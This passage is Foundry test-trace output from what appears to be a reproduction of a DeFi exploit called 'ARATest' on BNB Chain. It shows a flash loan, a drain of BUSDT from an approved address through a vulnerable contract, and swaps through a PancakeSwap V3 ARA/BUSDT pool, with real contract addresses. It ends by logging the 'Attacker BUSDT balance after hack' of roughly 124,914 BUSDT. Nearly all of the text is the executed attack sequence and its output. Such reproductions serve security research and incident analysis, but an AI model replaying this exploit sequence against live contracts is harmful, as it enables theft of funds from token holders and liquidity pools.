    │   │   │   │   ├─ emit Transfer(from: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], to: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], value: 132123000000000000000000 [1.321e23])
    │   │   │   │   ├─ emit Approval(owner: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], spender: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], value: 999999999999999999999999999999867645327700000000000000 [9.999e53])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x94356301faad832ef10f912d25d6e7ec53816cfd506ef8876c561a0cd1df9a9b: 0 → 0x000000000000000000000000000000000000000000001bfa66f56258378c0000
    │   │   │   │   │   @ 0xfd2ef4183e10edeb1d5f511569d0360d9fe1e1781b8c6999a87c7f964fa474dc: 0x0000000000000000000a70c3c40a64e6c51999090b65f6710326a69a3a454000 → 0x0000000000000000000a70c3c40a64e6c51999090b65da769c31444202b94000
    │   │   │   │   │   @ 0xe61b5ade45c1c09e562f5c0ce1ef38be9780f93f8d564f0cc490b05aec410af3: 0x000000000000000000000000000000000000000000001bfa6c2919d715405e2c → 0x0000000000000000000000000000000000000000000000000533b77eddb45e2c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [24562] BUSDT::approve(Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], 132123000000000000000000 [1.321e23])
    │   │   │   │   ├─ emit Approval(owner: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 132123000000000000000000 [1.321e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x57660c24519861ebed9c8967f18f1711fd58b497199519fc8f8496ab90e41ed7: 0 → 0x000000000000000000000000000000000000000000001bfa66f56258378c0000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [107124] Router::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x55d398326f99059fF775485246999027B3197955, tokenOut: 0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e, fee: 100, recipient: 0xB817Ef68d764F150b8d73A2ad7ce9269674538E0, amountIn: 132123000000000000000000 [1.321e23], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   │   │   │   ├─ [1772] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::getPool(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, BUSDT: [0x55d398326f99059fF775485246999027B3197955], ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], 100) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   │   ├─ [97327] 0x92974438C330d5c6790b4260e358e84513109872::swap(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], false, 132123000000000000000000 [1.321e23], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007ba5dd9bb357afa2231446198c75bac17cefcda9000000000000000000000000000000000000000000000000000000000000002b55d398326f99059ff775485246999027b31979550000645542958fa9bd89c96cb86d1a6cb7a3e644a3d46e000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [5731] ARA::transfer(Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], 12179785862839969368398 [1.217e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x92974438C330d5c6790b4260e358e84513109872, to: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], value: 12179785862839969368398 [1.217e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5ab05222bc01bbd07dcce9f87514d2d92fe8defb2f86be3bd27702c0c7e0ce2a: 0x00000000000000000000000000000000000000000000216685859a864db5e7f5 → 0x000000000000000000000000000000000000000000001ed24109c38af8bc1ea7
    │   │   │   │   │   │   │   @ 0x3ae39dbd065b56ec1c5a04f06f92b213843ad4402e7456164f5c0a2770b0ee5c: 0x0000000000000000000000000000000000000000000000000c162187d58accb3 → 0x0000000000000000000000000000000000000000000002945091f8832a849601
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] BUSDT::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1578666340532526347396210 [1.578e24]
    │   │   │   │   │   ├─ [12027] Router::pancakeV3SwapCallback(-12179785862839969368398 [-1.217e22], 132123000000000000000000 [1.321e23], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007ba5dd9bb357afa2231446198c75bac17cefcda9000000000000000000000000000000000000000000000000000000000000002b55d398326f99059ff775485246999027b31979550000645542958fa9bd89c96cb86d1a6cb7a3e644a3d46e000000000000000000000000000000000000000000)
    │   │   │   │   │   │   ├─ [1992] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::verifyCallback(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, BUSDT: [0x55d398326f99059fF775485246999027B3197955], ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], 100) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   │   │   │   ├─ [6034] BUSDT::transferFrom(Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], 0x92974438C330d5c6790b4260e358e84513109872, 132123000000000000000000 [1.321e23])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], to: 0x92974438C330d5c6790b4260e358e84513109872, value: 132123000000000000000000 [1.321e23])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: Exploitable Contract: [0x7BA5dd9Bb357aFa2231446198c75baC17CEfCda9], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x57660c24519861ebed9c8967f18f1711fd58b497199519fc8f8496ab90e41ed7: 0x000000000000000000000000000000000000000000001bfa66f56258378c0000 → 0
    │   │   │   │   │   │   │   │   @ 0x94356301faad832ef10f912d25d6e7ec53816cfd506ef8876c561a0cd1df9a9b: 0x000000000000000000000000000000000000000000001bfa66f56258378c0000 → 0
    │   │   │   │   │   │   │   │   @ 0x7cb93ad7b6e051e93f8e984994a4a0835a34cdb194e9b143700f7b82c734a411: 0x000000000000000000000000000000000000000000014e4bac7e45970bcf2472 → 0x000000000000000000000000000000000000000000016a461373a7ef435b2472
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [531] BUSDT::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1710789340532526347396210 [1.71e24]
    │   │   │   │   │   ├─ emit Swap(param0: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], param1: Approved Address: [0xB817Ef68d764F150b8d73A2ad7ce9269674538E0], param2: -12179785862839969368398 [-1.217e22], param3: 132123000000000000000000 [1.321e23], param4: 271631385385065173594569547640 [2.716e29], param5: 498956032713225615053170 [4.989e23], param6: 24643 [2.464e4], param7: 0, param8: 4360058999999999996 [4.36e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 4: 0x000000000000000226e89106a381a17000000000000000004ae3ed1a0746346f → 0x0000000000000002636a9b95fa40516c00000000000000004ae3ed1a0746346f
    │   │   │   │   │   │   @ 3: 0x00000000000000000000000000000000000a96566ce180d4edf4ea7d377a946b → 0x00000000000000000000000000000000000bbffdb21225c93074aaeafc00db4b
    │   │   │   │   │   │   @ 0: 0x0000000001000100000059fb000000000000000329e817705866072ac5ec27cc → 0x00000000010001000000604300000000000000036db0373b7c9b83fdf4119f78
    │   │   │   │   │   └─ ← [Return] -12179785862839969368398 [-1.217e22], 132123000000000000000000 [1.321e23]
    │   │   │   │   └─ ← [Return] 12179785862839969368398 [1.217e22]
    │   │   │   ├─  emit topic 0: 0x871ef507e8bf6dab3183ea49a907b33c82d681ebf93cdbbf010deb686990d6c0
    │   │   │   │           data: 0x000000000000000000000000000000000000000000001bfa66f56258378c00000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000294447bd6fb54f9c94e000000000000000000000000000000000000000000000000000000000000001200000000000000000000000055d398326f99059ff775485246999027b31979550000000000000000000000005542958fa9bd89c96cb86d1a6cb7a3e644a3d46e000000000000000000000000b817ef68d764f150b8d73a2ad7ce9269674538e0
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfd2ef4183e10edeb1d5f511569d0360d9fe1e1781b8c6999a87c7f964fa474dc: 0x0000000000000000000a70c3c40a64e6c51999090b65f6710326a69a3a454000 → 0x0000000000000000000a70c3c40a64e6c51999090b65da769c31444202b94000
    │   │   │   │   @ 0x57660c24519861ebed9c8967f18f1711fd58b497199519fc8f8496ab90e41ed7: 0 → 0x000000000000000000000000000000000000000000001bfa66f56258378c0000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1353] ARA::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 504468158749078470704724 [5.044e23]
    │   │   ├─ [732740] Router::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e, tokenOut: 0x55d398326f99059fF775485246999027B3197955, fee: 100, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, amountIn: 504468158749078470704724 [5.044e23], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [1763] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::getPool(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], BUSDT: [0x55d398326f99059fF775485246999027B3197955], 100) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   ├─ [722972] 0x92974438C330d5c6790b4260e358e84513109872::swap(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 504468158749078470704724 [5.044e23], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b5542958fa9bd89c96cb86d1a6cb7a3e644a3d46e00006455d398326f99059ff775485246999027b3197955000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [3271] BUSDT::transfer(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1327615916109788911433948 [1.327e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0x92974438C330d5c6790b4260e358e84513109872, to: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1327615916109788911433948 [1.327e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000001192233f95b43efeef8dc
    │   │   │   │   │   │   @ 0x7cb93ad7b6e051e93f8e984994a4a0835a34cdb194e9b143700f7b82c734a411: 0x000000000000000000000000000000000000000000016a461373a7ef435b2472 → 0x000000000000000000000000000000000000000000005123df7a4cab536c2b96
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1353] ARA::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   └─ ← [Return] 145549497233457263943335 [1.455e23]
    │   │   │   │   ├─ [14196] Router::pancakeV3SwapCallback(504468158749078470704724 [5.044e23], -1327615916109788911433948 [-1.327e24], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b5542958fa9bd89c96cb86d1a6cb7a3e644a3d46e00006455d398326f99059ff775485246999027b3197955000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [1983] 0xdAecee3C08e953Bd5f89A5Cc90ac560413d709E3::verifyCallback(0x41ff9AA7e16B8B1a8a8dc4f0eFacd93D02d071c9, ARA: [0x5542958FA9bD89C96cB86D1A6Cb7a3e644a3d46e], BUSDT: [0x55d398326f99059fF775485246999027B3197955], 100) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000092974438c330d5c6790b4260e358e84513109872
    │   │   │   │   │   ├─ [8233] ARA::transferFrom(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x92974438C330d5c6790b4260e358e84513109872, 504468158749078470704724 [5.044e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x92974438C330d5c6790b4260e358e84513109872, value: 504468158749078470704724 [5.044e23])
    │   │   │   │   │   │   ├─ emit Approval(owner: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], value: 115792089237316195423570985008687907853269984665640563534989425258834658935211 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5f6eee5777689fac8d5a6d5f66349ac0b0aaf490b4d918486710d1c6412d3a72: 0x000000000000000000000000000000000000000000006ad346101b6e6c7abe54 → 0
    │   │   │   │   │   │   │   @ 0x5ab05222bc01bbd07dcce9f87514d2d92fe8defb2f86be3bd27702c0c7e0ce2a: 0x000000000000000000000000000000000000000000001ed24109c38af8bc1ea7 → 0x0000000000000000000000000000000000000000000089a58719def96536dcfb
    │   │   │   │   │   │   │   @ 0x3f343b370308efd45a7ea9c2c72d9909f4c0f8ce132b412a6ca38dd339d619d3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff952cb9efe491938541ab
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [1353] ARA::balanceOf(0x92974438C330d5c6790b4260e358e84513109872) [staticcall]
    │   │   │   │   │   └─ ← [Return] 650017655982535734648059 [6.5e23]
    │   │   │   │   ├─ emit Swap(param0: Router: [0x13f4EA83D0bd40E75C8222255bc855a974568Dd4], param1: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 504468158749078470704724 [5.044e23], param3: -1327615916109788911433948 [-1.327e24], param4: 60822090253193321289976992110 [6.082e28], param5: 498956032713225615053170 [4.989e23], param6: -5288, param7: 16647449238719589490 [1.664e19], param8: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000017097022620d0a5c4d22e46c6309e → 0x000000000000000000000000000000000005e114d314330cc90deff2d6b10156
    │   │   │   │   │   @ 4: 0x0000000000000002636a9b95fa40516c00000000000000004ae3ed1a0746346f → 0x0000000000000002636a9b95fa40516c000000000000000131eb8bfb7980a0e1
    │   │   │   │   │   @ 0: 0x00000000010001000000604300000000000000036db0373b7c9b83fdf4119f78 → 0x000000000100010000ffeb580000000000000000c486da97618e891668ad516e
    │   │   │   │   └─ ← [Return] 504468158749078470704724 [5.044e23], -1327615916109788911433948 [-1.327e24]
    │   │   │   └─ ← [Return] 1327615916109788911433948 [1.327e24]
    │   │   ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1327615916109788911433948 [1.327e24]
    │   │   ├─ [425] BUSDT::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ emit log_named_decimal_uint(key: "Step 5. BUSDT amount out after second V3 swap", val: 1327615916109788911433948 [1.327e24], decimals: 18)
    │   │   ├─ [3271] BUSDT::transfer(DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], 1202701000000000000000000 [1.202e24])
    │   │   │   ├─ emit Transfer(from: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], value: 1202701000000000000000000 [1.202e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000001192233f95b43efeef8dc → 0x000000000000000000000000000000000000000000001a73a6b3264347daf8dc
    │   │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0x000000000000000000000000000000000000000000000000039287b4c1128635 → 0x00000000000000000000000000000000000000000000feae90d8bcb569268635
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 1: 2 → 1
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   └─ ← [Return] 29126081965403540800 [2.912e19]
    │   ├─ [531] BUSDT::balanceOf(DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   └─ ← [Return] 1202701257417339116619317 [1.202e24]
    │   ├─ [531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   └─ ← [Return] 29126081965403540800 [2.912e19]
    │   ├─ [531] BUSDT::balanceOf(DPPOracle: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   └─ ← [Return] 1202701257417339116619317 [1.202e24]
    │   ├─ emit DODOFlashLoan(: ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 1202701000000000000000000 [1.202e24])
    │   └─ ← [Stop]
    ├─ [531] BUSDT::balanceOf(ARATest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 124914916109788911433948 [1.249e23]
    ├─ [425] BUSDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker BUSDT balance after hack", val: 124914916109788911433948 [1.249e23], decimals: 18)
    ├─  storage changes:
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af4308: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af430b: 0 → 1
    │   @ 0x3f343b370308efd45a7ea9c2c72d9909f4c0f8ce132b412a6ca38dd339d619d3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 56.00s (53.68s CPU time)

Ran 2 test suites in 58.75s (56.97s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
